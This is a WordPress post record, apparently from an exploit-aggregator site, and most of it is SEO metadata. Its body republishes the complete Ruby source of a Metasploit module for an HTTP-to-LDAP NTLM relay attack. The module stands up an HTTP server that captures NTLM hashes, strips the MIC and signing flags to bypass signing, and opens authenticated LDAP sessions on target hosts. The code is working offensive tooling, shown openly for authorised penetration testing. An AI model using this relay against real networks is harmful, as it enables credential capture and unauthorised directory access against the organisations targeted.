{"id":50507,"date":"2026-04-30T14:44:39","date_gmt":"2026-04-30T14:44:39","guid":{"rendered":"http:\/\/localhost\/?p=50507"},"modified":"2026-04-30T14:44:39","modified_gmt":"2026-04-30T14:44:39","slug":"microsoft-windows-http-to-ldap-relay","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50507","title":{"rendered":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-"},"content":{"rendered":"

{“lastseen”:”2026-04-30T19:28:02″,”description”:”This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured RHOSTS hosts. It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check…”,”published”:”2026-04-30T18:57:43″,”modified”:”2026-04-30T18:57:43″,”type”:”metasploit”,”title”:”Microsoft Windows HTTP to LDAP Relay”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\nrequire ‘openssl’\\nrequire ‘rex\/proto\/gss’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpServer::Relay\\n include Msf::Auxiliary::CommandShell\\n\\n attr_accessor :service\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Microsoft Windows HTTP to LDAP Relay’,\\n ‘Description’ =\\u003e %q{\\n This module supports running an HTTP server which validates credentials, and\\n then attempts to execute a relay attack against an LDAP server on the\\n configured RHOSTS hosts.\\n\\n It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check\\n (MIC). As a result, this will only work with NTLMv1. The module takes care of\\n removing the relevant flags to bypass signing.\\n\\n If the relay succeeds, an LDAP session to the target will be created. This can\\n be used by any modules that support LDAP sessions, like `admin\/ldap\/rbcd` or\\n `auxiliary\/gather\/ldap_query`.\\n\\n Supports LDAP and captures NTLMv1 as well as NTLMv2 hashes.\\n },\\n ‘Author’ =\\u003e [\\n ‘jheysel-r7’ # module and http_relay server\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Actions’ =\\u003e [\\n [ ‘CREATE_LDAP_SESSION’, { ‘Description’ =\\u003e ‘Create an LDAP session’ } ]\\n ],\\n ‘PassiveActions’ =\\u003e [ ‘CREATE_LDAP_SESSION’ ],\\n ‘DefaultAction’ =\\u003e ‘CREATE_LDAP_SESSION’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SAFE ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘SideEffects’ =\\u003e [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(389)\\n ]\\n )\\n\\n register_advanced_options(\\n [\\n OptBool.new(‘RANDOMIZE_TARGETS’, [true, ‘Whether the relay targets should be randomized’, true]),\\n OptInt.new(‘SessionKeepalive’, [true, ‘Time (in seconds) for sending protocol-level keepalive messages’, 10 * 60])\\n ]\\n )\\n end\\n\\n def srvport\\n datastore[‘SRVPORT’]\\n end\\n\\n def relay_targets\\n Msf::Exploit::Remote::Relay::TargetList.new(\\n :ldap,\\n datastore[‘RPORT’],\\n datastore[‘RHOSTS’],\\n datastore[‘TARGETURI’],\\n randomize_targets: datastore[‘RANDOMIZE_TARGETS’],\\n drop_mic_only: false,\\n drop_mic_and_sign_key_exch_flags: true\\n )\\n end\\n\\n def check_options\\n unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)\\n fail_with(Failure::BadConfig, ‘This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`’)\\n end\\n end\\n\\n def run\\n check_options\\n\\n start_service\\n print_status(‘Server started.’)\\n @http_relay_service.wait if @http_relay_service\\n end\\n\\n def on_relay_success(relay_connection:, relay_identity:)\\n print_good(‘Relay succeeded’)\\n session_setup(relay_connection, relay_identity)\\n rescue StandardError =\\u003e e\\n elog(‘Failed to setup the session’, error: e)\\n end\\n\\n def session_setup(relay_connection, relay_identity)\\n client = relay_connection.create_ldap_client\\n ldap_session = Msf::Sessions::LDAP.new(\\n relay_connection.socket,\\n {\\n client: client,\\n keepalive_seconds: datastore[‘SessionKeepalive’]\\n }\\n )\\n domain, _, username = relay_identity.partition(‘\\\\\\\\’)\\n datastore_options = {\\n ‘DOMAIN’ =\\u003e domain,\\n ‘USERNAME’ =\\u003e username\\n }\\n start_session(self, nil, datastore_options, false, ldap_session.rstream, ldap_session)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/server\/relay\/http_to_ldap.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/server\/relay\/http_to_ldap\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-30T19:28:02″,”description”:”This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-50507","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nMicrosoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50507\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-30T19:28:02″,”description”:”This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50507\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-30T14:44:39+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-\",\"datePublished\":\"2026-04-30T14:44:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507\"},\"wordCount\":742,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50507#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507\",\"name\":\"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-30T14:44:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50507\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50507#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50507","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem","og_description":"{“lastseen”:”2026-04-30T19:28:02″,”description”:”This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured...","og_url":"https:\/\/zero.redgem.net\/?p=50507","og_site_name":"zero redgem","article_published_time":"2026-04-30T14:44:39+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50507#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50507"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-","datePublished":"2026-04-30T14:44:39+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50507"},"wordCount":742,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50507#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50507","url":"https:\/\/zero.redgem.net\/?p=50507","name":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-30T14:44:39+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50507#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50507"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50507#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50507"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50507\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}